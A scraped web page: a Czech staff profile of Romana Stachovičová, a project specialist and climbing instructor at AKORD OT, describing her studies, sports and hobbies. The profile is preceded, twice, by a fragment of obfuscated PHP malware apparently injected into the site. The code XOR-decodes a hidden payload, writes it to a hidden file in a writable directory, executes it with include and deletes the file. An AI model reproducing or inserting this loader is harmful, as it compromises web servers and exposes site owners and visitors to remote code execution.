100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Romana Stachovičová - AKORD OT

projektová specialistka pro oblast indoor, instruktorka outdoorových kurzů a teamspiritových programů

  • s AKORDem začala jako instruktorka spolupracovat v roce 2013, v srpnu 2017 nastoupila na pozici Projektové specialistky pro oblast indoorových kurzů
  • je absolventkou oboru Aktivity v přírodě na PedF UJEP v Ústí nad Labem, a navazujícího magisterského studia Sport a tělesná výchova
  • část studia strávila ve Španělsku na studijním pobytu, během cestování se jí zalíbila kultura v Maroku
  • aktivně se věnuje sportu, její vášeň jsou dvě kola a lezecký materiál
  • vyučuje lezení v DDM4 Hobby centrum v Praze a je instruktorkou lezení na umělé stěně
  • zkušenosti záskavala nejen jako oddílová vedoucí pro děti se sportovním zaměřením, ale i jako zdravotnický asistent Nemocnice Břeclav
  • miluje knihy, velmi často navštěvuje galerie moderního umění a scénografická čtení v divadlech
  • ráda poznává nepoznané
  • na kurzech srší energií a hýří úsměvy, je radost se s ní potkat